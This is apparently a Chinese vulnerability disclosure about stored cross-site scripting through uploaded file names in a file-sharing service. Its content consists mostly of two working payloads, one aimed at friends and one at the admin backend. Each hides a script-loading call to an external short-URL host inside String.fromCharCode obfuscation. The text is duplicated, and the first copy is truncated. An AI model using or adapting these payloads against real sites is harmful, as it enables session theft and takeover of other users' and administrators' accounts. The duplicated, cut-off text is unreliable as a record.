### 简要描述: 指哪打哪,可打后台 ### 详细说明: linux下可以使用<>作为文件名 上传一个名字为 ``` <img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"> ``` 的文件共享给好友就可以指谁X谁 假如要X后台上传文件名为 ``` "</a><img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"> ``` 偷懒代码就不审计了 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg) [<img src="https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg" alt="1.jpg" width="600"...
### 简要描述: 指哪打哪,可打后台 ### 详细说明: linux下可以使用<>作为文件名 上传一个名字为 ``` <img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"> ``` 的文件共享给好友就可以指谁X谁 假如要X后台上传文件名为 ``` "</a><img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"> ``` 偷懒代码就不审计了 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg) [<img src="https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg)
